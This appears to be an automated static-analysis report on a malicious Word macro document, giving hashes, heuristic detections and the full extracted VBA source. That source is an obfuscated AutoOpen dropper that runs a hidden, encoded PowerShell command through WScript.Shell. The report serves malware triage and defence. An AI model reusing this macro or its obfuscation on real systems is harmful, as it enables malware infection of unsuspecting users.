Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5664b29927baa7b6…

MALICIOUS

Office (OLE)

88.4 KB Created: 2018-08-23 06:15:00 Authoring application: Microsoft Office Word First seen: 2021-02-19
MD5: 8859ea950e051070ef298ee027c3429e SHA-1: 2c12def6769f1ad64d4f368f0040c24822ae36d7 SHA-256: 5664b29927baa7b6ffb6c43cbf299deaca165faff69ebf39e0643a2e0e712b48
310 Risk Score

Heuristics 10

  • ClamAV: Doc.Malware.Ddma-6691546-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ddma-6691546-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10174 bytes
SHA-256: 2f462063740cc6f749ffe21d76caa565ee21399bab85482d9904aef7e8fe8ec7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
142 of 227 identifiers look randomly generated (e.g. 'ndsCifZXXbKzbi'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hVjmXUfjsT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TlGDwozEkCdrB"
Function YJzAntBCW()
On Error Resume Next
Error jZQhW / 6012 / 75010 * TSBRw
   Error TDOUc / sFalDk
   Error 86899 * hbpawV
UGUXAz = "MD /v^" + ":^" + "  ^ ^  " + " /r  " + " " + CStr(Chr(GcqwpJaKI + ndsCifZXXbKzbi + 34 + VpFFiKWwmlETb + pMnPirYnG)) + "  ^" + "s^Et" + " " + "P^" + "d=^="
Error 93843 * hsjdkz
rTJjc = "=^A" + "^A" + "gAAIA^" + "A" + "C^A^gA" + "AI" + "AACA" + "^gAA^I^" + "AAC^"
Error wZMYZw * zYFtQd * 59388 * niiiO
   Error GjwTL * SlisVr
   Error 95089 / DOuNI * 1460 * vQJOz
XqncitJXktd = "A^g^AAI" + "^AAC" + "Ag^" + "AAI" + "A^AC^" + "Ag" + "^A^AI^A" + "^0" + "^H^A^9B" + "^w^e" + "AgG"
Error 96959 / hrOnNj * vVbZD * 24619
   Error 50352 * lJKqa
   Error 6883 * wVlRkC / 83251 / Clwqz
jsfBvXPvORl = "Aj^" + "B" + "^A^d^AE" + "^" + "G" + "^AjB^" + "Qf^" + "AsD^ArB" + "Q^Y^A"
Error 76623 * DSYCU * QWCUw / czjGHU
   Error OcOsj / pnHPc * 25901 / MKEWwk
qDQQicdr = "^U^GA^y" + "B^gY" + "AsD^AzB" + "^gY^A" + "^0E^" + "A^" + "k" + "^A^AI"
YJzAntBCW = UGUXAz + rTJjc + XqncitJXktd + jsfBvXPvORl + qDQQicdr
   Error LZwLE / pomcFS
   Error vTdsU / 44546 / MIRBjN * QqQsN
   Error zHzFJR / jOhTi
End Function
Function hqNLz()
On Error Resume Next
Error 34002 / ndMoLK / TMrsmA * ZPVCjf
   Error 62940 * QbvYVo
   Error dbhDul / hEZDzQ * 46507 / aVmUk
fvnQDbpw = "^A0^G^A" + "l" + "^BA" + "dA" + "^"
Error 55856 / KJAXB * 77114 * PiWIAm
   Error zuQbwM * tHHNJm
VrKcfjhd = "k" + "EA^t^" + "A" + "Q^Z^" + "A^s^GA" + "vB" + "gdA^" + "4^" + "GAJ" + "B^w^"
Error 75202 * jPuujf / jwlim * mErmYW
SoswLiMPfIT = "OAkCA" + "zB^gY^" + "A^" + "0E" + "Ak" + "AAI^A^" + "w"
Error 66932 * bduoC
   Error 84803 * zBzbE * 54251 * uVaWD
pazpalz = "CA" + "vBg^eAw" + "^GAk" + "AA" + "^KAU^" + "GA^s" + "^B^Q"
Error ZrjKMH * YBwzi * WdWCAM * fMCnl
   Error WGYSV * ISQHit / 52776 * 14239
   Error jIJRz / HopGiY * rzTGG / pLLpn
   Error 55687 * kEIznP * KrGvtm / CHsqJ
pjkfSickd = "aAYEA" + "k^BQY^A" + "8^G" + "A" + "^sB"
Error 57359 / shDNPX * 12216 * NzWwUM
   Error 38468 / RPcti
   Error aOFRX / PNZpj
   Error 7208 / YQjMo / pbHJN * sZcEuS
YFQHjOwTCdV = "g^" + "b^AcH^A" + "v" + "^B" + "AR" + "^A^4C^A" + "YBg" + "^" + "d^Ac" + "HAk^Aw"
Error 23376 / kkBNB
   Error iwmAS / NAhJYi / loLrit * onPjp
   Error 17587 * bOzYFX / 458 / MYSudt
   Error 98075 / ljqtM * 81682 / 82083
homHA = "e" + "^AkH" + "Ay^B" + "^A^dA" + "s^HA^p^" + "AA"
hqNLz = fvnQDbpw + VrKcfjhd + SoswLiMPfIT + pazpalz + pjkfSickd + YFQHjOwTCdV + homHA
   Error YTKzZJ * HwSLza
   Error iSvNl / CEPRYC
   Error 34466 * fXvZJj * 14523 * UviCLY
End Function
Function ZNJizjw()
On Error Resume Next
Error 18655 * uOCUL * SUWmn * qYIGYm
HtrBuYTCi = "^a^As^" + "EA^" + "M^B^A^J" + "^A^ACAu" + "^B^Q^a" + "^A^AC^" + "Av^Bg^e" + "Aw^" + "GAkAA" + "KA^g^G"
Error awLAa * zDbOqI / dSzZz / VTwzbj
   Error GimlH * jwpok
   Error 38241 / ivzEZj
   Error 30226 / tiWOu / AGjJoF / 32748
MLipMAnz = "Aj^B" + "Q" + "Y^AU" + "GAy^Bw" + "bA^YG^A" + "7A^wJ^A"
Error 77883 * PbpDz
   Error knsSW / ZJfWqE * isAFG / 44037
   Error 22232 / HiPDc * kQGbtZ * dikifc
ZKwlJC = "U^G" + "^A^4^B^" + "Q" + "Z^A^4" + "CAnA" + "wK^A" + "o^F^A^H" + "B^"
Error 2153 / lCbwSn / YCMGV * BGSzJb
SsOMwEnPTF = "QbA^QC^" + "Ar^AwJ" + "Aw^F" + "^An" + "^A^wK^A" + "M" + "GA^pB" + "A"
Error 74994 / 400 * GYwMib * Kmmvvq
   Error VRznr / NFwwn
   Error 23308 * 27080
   Error EUZWbj / aBUjrG * 31569 * 90074
lwTSrkwt = "bA^IG" + "A1" + "B^Ac^A" + "^o^D" + "^A^" + "2B" + "^g^b" + "^A^"
Error FlMzM / MQclJ
hSrwnJzQ = "UGA^kA^" + "Q^P^A^" + "M^H^A" + "i^B" + "^QTA" + "QC" + "A7^A" + "wJ^AkD" + "^A3^AQ" + "NA" + "c"
Error habJC * PDJIN / 51104 / lzMjk
   Error ZUjBr / XkNszw / mfjlGZ / uwjzXd
   Error 12064 * EFSnGJ / 16736 * 75003
UwSrHN = "CA^g^" + "AQ^P" + "^A" + "^AC^A^" + "a^B" + "^wR^"
Error SNkfp * LPjQF
   Error ZKQXao * dNmqvU
   Error 77957 / dYtDmM
PBvZzSq = "A^0G^" + "Ak^A^w^" + "O" + "A^" + "kC^A" + "n^A" + "^AQ^" + "Ac" + "C^Ao"
Error EaujVB / LvQmfO * wZHRZv / TwPZB
   Error nzTmL / MrPJPm / unbWS * NcjMX
tjdof = "^A^A" + "^d" + "^A^k^G^" + "A^s" + "B^Ac" + "^A" + "M^F"
Error 43531 / qDSPDY / wQZlbi / Uqbjo
   Error EzCMbb * LvZUca * zsuYis * 95308
   Error HnvbPj * zjnNAw
cJFBDUbcWA = "A^uAw" + "^JA^Y^" + "F^A^0" + "^Agc^A^" + "U^GA" + "K^BQM^" + "AkD^A" + "v^A" + "^A^d^A" + "U^GA^"
Error QzEbX / jLFkst / 17370 * CJFLp
   Error Kiczs * rwlcKq / hKOuuY * BEIFsv
   Error 95382 * SVSWY / KtwlE * DbzQm
VHwJfWSzU = "u^B^g" + "LAc^GA^" + "u" + "^BQa" + "^A^" + "s^G^" + "A^jB" + "Q" + "YA^g^" + "G^" + "Au^B" + "^" + "gc^"
Error 19858 / aWFwT / dtXNsA * tmQPEC
   Error 69467 * XocmH
   Error rEzzo / QbdfU / PUIhDT / suKRQ
EPdqImLuY = "AEG" + "A" + "lB" + "^" + "AbA^4" + "CA" + "^kB^A^" + "Z^A^"
Error pIRnl * nGcQF
   Error 39829 * SwzHt * MiXWZ * QTjjFM
   Error bWcChs * CDBJOC
   Error hRiwqF * jBwla
NwbzWw = "8^GAv^" + "AwL^AoD" + "A^" + "w^B^A^" + "d^A^" + "Q" + "HAo^" + "B^AQ^A^" + "gD^A3A^" + "wQA" + "^U^H^" + "A^GB" + "AeA8C^A"
ZNJizjw = HtrBuYTCi + MLipMAnz + ZKwlJC + SsOMwEnPTF + lwTSrkwt + hSrwnJzQ + UwSrHN + PBvZzSq + tjdof + cJFBDUbcWA + VHwJfWSzU + EPdqImLuY + NwbzWw
   Error 72455 * LNkPG
   Error MKwnK / boZzKo / 31181 / lckQi
   Error 40897 * MOuNVL
   Error 39107 * jNCoj / 92125 * wZBVJ
End Function
Function MFUYYiizJu()
On Error Resume Next
Error Qzisw / Qwohz / 51624 / kfSPLF
   Error 9490 * nrnEdv / 60951 / LzRFa
TzEwlON = "t^B^wb" + "A^MGA" + "u" + "A^QZAAH" + "^" + "AvBAa^"
Error 17374 * kziBz / 89377 / Klcjz
Znnwhu = "AsGA" + "^y^" + "B^Q^aA" + "^sGAtB^" + "Q^aAQ^H" + "^A^u^" + "AAd" + "A^M" + "^HA^lB" + "Ad" + "^A^8CA"
Error zkXrnD / fiJkFi * SUQSRQ * 89366
   Error IHWvzX / UzjfiC * UiXHpz * OTQCTW
cbckqEMd = "vA^g^O^" + "A" + "A" + "H" + "^A0^BAd" + "^A^g^GA" + "ABwZAk" + "^DApB^"
Error ditnG / 86234 / AQWCwI * PqXCoz
inistzWwkic = "w^T^AYG" + "A1A" + "^" + "wL" + "^A^0^G" + "^AvB^wY" + "^A4CAp" + "B^w^Y" + "AcGA" + "^hBAZ" + "^A^I"
Error JJYpd * pIfTMd
   Error jBwmB * zDlsF
wlriSO = "H" + "A" + "^1B^" + "wZ^A" + "^o" + "H" + "Av^B^g^" + "L" + "A8G"
Error izTUC * AhjIw
   Error MPzrc / vXOizp
   Error rWvNlT / mKGdu / SQGCY / 20082
NrqPOuZka = "As" + "^" + "B^Q^a^" + "A^YGA" + "^j^B^" + "Q" + "^YA" + "^I^H^" + "A^h"
Error 28760 / JFstj / 25735 * btiNN
mIvCiYWr = "^Bw^LA" + "8CA^6A" + "^AcAQH" + "A^0" + "^B" + "^A" + "^a^" + "AA^E" + "A" + "3" + "^"
Error PQTihQ * 71606 / aDGlX * rVzuYi
   Error 75912 / UZFjNE / 95359 / TIqzG
   Error 96305 * PPGBJL / 90877 / 48608
FasSU = "B^" + "w^LAw^G" + "A^w^B^g" + "L^A^Q" + "^G^" + "A" + "^0A^Q^" + "YA^" + "U^GA" + "nBwbA^" + "I" + "^"
Error wclAu / isHJn / 26751 * 2001
ZVDQADkIEK = "H^Aw^B^" + "w^L" + "^A^8C" + "A6^A^Ac" + "^AQ^H" + "^A^" + "0B^A" + "aAA^E" + "A^h^" + "B" + "^g" + "YA^8C" + "AtBw^b^"
Error 55605 / 87463 / 74667 / hBkOjs
   Error 11343 / nqvuNb / RjISG / UbIIZ
   Error 46063 * fzFbhY
oiLcvjkqDV = "A^M^G" + "Au^A^w" + "c^AcGA^" + "uB^" + "Qa" + "AY^HAh" + "^B^wcAk" + "HAn^Bg" + "cAUGAuB" + "Q^" + "ZA" + "^w" + "G^"
Error Zwrpp * LOFUz
   Error UVOjJF / TLBJPp * 17384 / CVisFA
   Error 17880 * fmEzLK / YiQRjw * PTEpOv
   Error 42955 * BmCKG / 48002 * 48358
koWcEpGzJF = "AhB" + "^wY^" + "A4G" + "A" + "^y" + "^BQ^Z" + "^A^g^G" + "A^0^B" + "^QdA8^G" + "A^z^BwL" + "A^8C^" + "A^6"
Error MnAWAc * BSllY / 83525 * GuOYA
   Error 30 / TLkqFo
zwPShswRRrj = "AAc^AQ" + "^" + "HA0^B" + "AaAc" + "CA^9" + "^" + "A^Aa^A" + "^s" + "^EA^M" + "B^A^J" + "A^s"
MFUYYiizJu = TzEwlON + Znnwhu + cbckqEMd + inistzWwkic + wlriSO + NrqPOuZka + mIvCiYWr + FasSU + ZVDQADkIEK + oiLcvjkqDV + koWcEpGzJF + zwPShswRRrj
   Error TbhMcw / bDIFpb
   Error Ywwuuk * wIbZSv * CqzVWF / iRlzS
   Error 27099 / GmKizZ * 85956 * pjpUI
End Function
Function ZOkwWAJDMS()
On Error Resume Next
Error 41038 / kQlCIq * NfIcc / kDdrj
Hvmfd = "^D^A^0B" + "^gbAU^G" + "^A^" + "pBAbA^M" + "^" + "E^" + "Ai^B^QZ" + "^A" + "c^F" + "A^uA^" + "A^d"
Error IhsjLU / 69250
   Error cwEjh * bbGCm
   Error UFbNu / NzbZjd
hmalo = "A" + "^UG^A^O" + "^B" + "AIAQ" + "H^AjBQ^" + "Z^AoG" + "^A^i^B" + "w^" + "bA^0C^"
Error iwtnnY * aREOkT * YZJdm / 7029
   Error 23905 / FXXMVN / iNfvsi / ivSXKW
   Error rzQpAf / Awdabc / 96007 * DUCMT
   Error 18700 / QDitz * 21662 * uvwApw
   Error 18349 * 79432
   Error 31757 / jRwXv / 61058 / mEtLQT
TzqmfbVD = "A3B^QZ" + "A4" + "G" + "A^9" + "AAW^AY"
Error 69776 / DXKQww / 71697 / 80320
   Error udSKrH * Edzlhf * 23231 * DVZRK
ohjCdqal = "HA^" + "3^B" + "^AJ " + "e^" + "- ^l" + "^le^h^s" + "r^e^" + "wop&& " + " " + " ^f^" + "O"
Error zFXIj / cwsaOZ / 35151 * nQSjZS
   Error sHlcp / WARaup
   Error owZqR * jPmjr
   Error ciCDzX * 39098 * 51231 * vzzCj
NDFYhzVlMI = "r /^L " + "%^o ^" + "iN ( 9" + "^9^7" + "^ ^-1 ^"
Error AcsjJP * KKfvO / OPQXN * HOQWt
   Error WNArT / 44053
zwpajZisYCw = "0)  d^" + "o " + "   ^s" + "^et" + " " + "  ^pR" + "^U" + "D" + "=" + "!" + "^pR^" + "UD!!"
Error vfsJZ / vNwaO * BuVOmd * BIzjT
zuNPKshjm = "P^d:~ " + "   %^" + "o, 1!" + "&&i^F %" + "^o   ^L" + "E^" + "Q ^0 " + " C^A^L"
Error mrtzw * DDHfd / 83224 * qOoQqw
   Error QkFwY / NdfRW / sOATq / jzNtC
XiBsQwsiEhA = "l  " + "%" + "^pR^UD" + ":^~^ ^" + "-^9^9^8" + "% " + "  " + CStr(Chr(JqwdOPQREVCzO + uPzaGvaJ + 34 + oTuAwCziuAfBJ + DKswnOYmYzJpf)) + "    "
ZOkwWAJDMS = Hvmfd + hmalo + TzqmfbVD + ohjCdqal + NDFYhzVlMI + zwpajZisYCw + zuNPKshjm + XiBsQwsiEhA
   Error 63979 / HisKWW
End Function


Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
   Error EYHSt * oNCwD / 50375 * TGfFQW
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.